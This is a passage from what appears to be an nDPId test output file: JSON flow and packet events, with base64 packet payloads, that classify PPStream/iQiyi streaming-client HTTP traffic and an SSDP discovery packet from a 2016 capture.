xpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7560000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\/0Jh1AYAQRafgAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0xJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9MzEmcj00Nzk1MzEwMDAmYWlkPTE4MDkzMjMwMSZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnB1PSZvcz1XaW5kb3dzJTIwNyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE5NSZpc2xvY2FsPTAmYXM9MDMxMWM1YTBkNTU5NjA2M2RiNTk0NGJkNzZiNmNiZmYmdmU9YjFmOTBmOGRhNmZlMDI1OGQxMzYxNmE4MDcwY2I5OTcmcGU9JnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
+01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7560000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7560000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"thread_ts_msec":1467353196441,"pkt":"TF4M6gNlABxCjnAxCABFAAF8MmRAAIAGDUzAqHMIb84WTcZYAFAHr7sEMj+LIFAYAQTIFgAAR0VUIC9iP3Q9MTEmcGY9MjAxJnA9MTEmcDE9MTE0JnMxPTAmY3Q9MTQwODE5X2Fkc3luJmFkc3luPTEmYnJpbmZvPUlFX0lFOV85LjAuODExMi4xNjQyMV8xJm9zPVdpbmRvd3MlMjA3JnJuPTE5MjUyJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj01LjIuMTUuMjI0MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7560000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7560000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01967{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"thread_ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJUEzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} 
+01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7560000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B
66X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"} +02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUa
lWIrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1467353197131,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353197131,"pkt":"AQBef\/\/6dNArkea6CABFAAChc\/sAAAERIa3AqHMB7\/\/\/+scBB2wAjWbYTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
